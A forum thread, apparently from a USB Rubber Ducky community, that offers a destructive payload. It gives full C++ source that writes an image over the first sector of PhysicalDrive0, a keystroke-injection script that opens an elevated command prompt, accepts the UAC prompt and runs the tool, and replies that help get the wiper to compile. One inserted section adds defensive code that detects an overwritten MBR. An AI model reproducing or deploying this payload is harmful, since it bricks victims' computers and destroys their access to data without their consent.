
ThoughtfulDev

[DANGEROUS] Nyancat Bootloader Overwrite


Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)

I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.

CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM

1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

#include <windows.h>
#include <conio.h>
#include <iostream>

int main(int argc, char* argv[]){
	DWORD dw;
	const char *pathToBin = "boot.bin";
	HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
	if (drive != INVALID_HANDLE_VALUE){
		HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
		if (binary != INVALID_HANDLE_VALUE){
			DWORD size = GetFileSize(binary, 0);
			if (size > 0){
				byte *mbr = new byte[size];
				if (ReadFile(binary, mbr, size, &dw, 0)){
					std::cout << "Binary file successfully read!" << std::endl;
					if (WriteFile(drive, mbr, size, &dw, 0)){
						std::cout << "First sector overwritten successfully!" << std::endl;
					}
					else
						std::cerr << "Fatal error! Can't overwrite 1st sector!" << std::endl;
				}
				else
					std::cerr << "Error reading from binary file!" << std::endl;
				delete[] mbr;
			}
			else
				std::cerr << "Invalid binary file!" << std::endl;
		}
		else{
			std::cerr << "Can't find the binary file to read from!" << std::endl;
		}
		CloseHandle(binary);
	}
	else
		std::cerr << "Administrator privileges required!" << std::endl;
	CloseHandle(drive);
	return 0;
}

2. Create a folder named exec on your Ducky SD card and copy boot.exe into it.

3. Download the img file from https://github.com/brainsmoke/nyanmbr, rename it to boot.bin and put it at DUCKY\exec\boot.bin

4. Here is the Duckyscript (make sure your SD card is labelled DUCKY):

REM I am NOT responsible for ANY DAMAGE
REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
DELAY 5000
ESCAPE
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
REM replace with the desired UAC alt + key combo (y for yes in English, j for German, etc.)
ALT y
DELAY 1500
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
ENTER
DELAY 300
STRING cd exec
ENTER
DELAY 300
STRING boot.exe
ENTER
DELAY 1000
STRING exit
ENTER


I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen), which makes generating payloads easier.


boot.exe

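The tool above writes whatever is in boot.bin straight over the first sector of PhysicalDrive0, and the replacement is itself a valid bootable image, so checking the 0x55 0xAA marker alone will not tell a defender that the sector changed. Added example (my code, not from the thread or from nyanmbr): it parses a 512-byte MBR, counts the surviving partition entries and compares the boot-code region against a baseline hash, using two constructed sample sectors; reading the real sector from \\.\PhysicalDrive0 with GENERIC_READ is assumed to happen elsewhere.

```cpp
#include <array>
#include <cstdint>
#include <cstring>

// MBR layout: 440 bytes of boot code, then a disk signature, four 16-byte
// partition entries at offset 0x1BE, and the 0x55 0xAA marker at 0x1FE.
constexpr size_t kSector = 512, kBootCode = 440, kPartTable = 0x1BE;
using Sector = std::array<uint8_t, kSector>;

// signatureOk: trailing marker present; bootCodeMatches: boot-code hash equals
// the known-good baseline; partitions: entries whose type byte is non-zero.
struct MbrCheck { bool signatureOk, bootCodeMatches; int partitions; };

// FNV-1a 64-bit over the boot-code region. Record it while the machine is
// known-good; a later mismatch means the first sector was replaced.
uint64_t bootCodeHash(const Sector& s) {
    uint64_t h = 1469598103934665603ULL;
    for (size_t i = 0; i < kBootCode; ++i) { h ^= s[i]; h *= 1099511628211ULL; }
    return h;
}

MbrCheck checkMbr(const Sector& s, uint64_t baseline) {
    MbrCheck r{};
    r.signatureOk = (s[510] == 0x55 && s[511] == 0xAA);
    r.bootCodeMatches = (bootCodeHash(s) == baseline);
    for (int i = 0; i < 4; ++i)
        if (s[kPartTable + 16 * i + 4] != 0) ++r.partitions;  // partition type byte
    return r;
}

// Constructed sample: a known-good sector with one active NTFS partition.
Sector sampleGoodMbr() {
    Sector s{};
    for (size_t i = 0; i < kBootCode; ++i) s[i] = static_cast<uint8_t>(0x33 + i % 7);
    uint8_t* e = s.data() + kPartTable;
    e[0] = 0x80; e[4] = 0x07;                    // active flag, NTFS type
    uint32_t lba = 2048, len = 204800;           // little-endian LBA start/length
    std::memcpy(e + 8, &lba, 4); std::memcpy(e + 12, &len, 4);
    s[510] = 0x55; s[511] = 0xAA;
    return s;
}

// Constructed sample: the same disk after a whole-sector overwrite by an image with
// no partition table. The marker survives (every boot image has one), so it proves nothing.
Sector sampleOverwrittenMbr() {
    Sector s{};
    for (size_t i = 0; i < kBootCode; ++i) s[i] = static_cast<uint8_t>(i * 31);
    s[510] = 0x55; s[511] = 0xAA;
    return s;
}
```

Against the good sector the check returns a matching hash and one partition; against the overwritten one the marker still passes, but the hash mismatches and no partition entries remain.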

The code seems fine to me. Make sure you have boot.bin in the same location as the source file.


Line 10: HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
pathToBin
Error: argument of type "char *" is incompatible with parameter of type "LPCWSTR"

4 hours ago, Neptunium said:

Error: argument of type "char *" is incompatible with parameter of type "LPCWSTR"

This isn't really the source code's problem, but an issue with your compiler configuration. I assume you're using Visual Studio, and if you are - you need to configure your project to use the Multi-Byte Character Set (Found in the project properties under the General section, iirc). You can alternatively cast to a LPCWSTR, but that isn't a better option.

I would recommend reading about the different character types that you will encounter in Windows C++ development here.
